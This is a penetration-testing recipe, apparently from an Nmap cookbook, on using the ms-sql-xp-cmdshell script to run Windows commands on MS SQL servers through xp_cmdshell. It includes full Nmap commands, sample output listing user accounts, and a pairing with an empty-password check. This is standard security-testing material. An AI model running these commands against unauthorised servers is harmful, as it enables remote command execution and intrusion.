MS SQL servers have a stored procedure called xp_cmdshell
. This feature allows programmers to execute commands through the MS SQL server. Nmap helps us execute custom shell commands when this option is enabled.
This recipe shows how to run Windows commands through MS SQL servers by using Nmap.
Open your terminal and enter the following Nmap command:
$ nmap --script-args 'mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 <target>
The results will be included in the script output section:
PORT STATE SERVICE VERSION 1433/tcp open ms-sql-s Microsoft SQL Server 2011 11.00.1750.00 | ms-sql-xp-cmdshell: | [192.168.1.102:1433] | Command: net user | output | ====== | | User accounts for \ | | ------------------------------------------------------------------------------- | Administrator cldrn Guest | postgres | The command completed with one or more errors. | |_
MS SQL servers usually run on TCP port 1433. The argument --script-args 'mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433
makes Nmap initiate the script ms-sql-xp-cmdshell
and then sets the authentication credentials to be used if an MS SQL server is running on port 1433.
The script ms-sql-xp-cmdshell
was written by Patrik Karlsson. It attempts to run an OS command through the stored procedure xp_cmdshell
found on MS SQL servers. This script depends on the mssql
library. Its documentation can be found at http://nmap.org/nsedoc/lib/mssql.html.
By default, ms-sql-xp-cmdshell
will attempt to run the command ipconfig /all
, but you can specify a different one by using the script argument ms-sql-xp-cmdshell.cmd
:
$ nmap --script-args 'ms-sql-xp-cmdshell.cmd="<command>",mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 <target>
If the server does not have the xp_cmdshell
procedure enabled, you should see the following message:
| ms-sql-xp-cmdshell: | (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.) | [192.168.1.102MSSQLSERVER] |_ Procedure xp_cmdshell disabled. For more information see "Surface Area Configuration" in Books Online.
If you did not provide any valid credentials for authentication, the following message will be displayed:
| ms-sql-xp-cmdshell: | [192.168.1.102:1433] |_ ERROR: No login credentials.
Remember that you can use this script in combination with ms-sql-empty-password
to automatically retrieve the network configuration of an MS SQL server with a sysadmin account with an empty password:
$ nmap --script ms-sql-xp-cmdshell,ms-sql-empty-password -p1433 <target>
3.17.76.175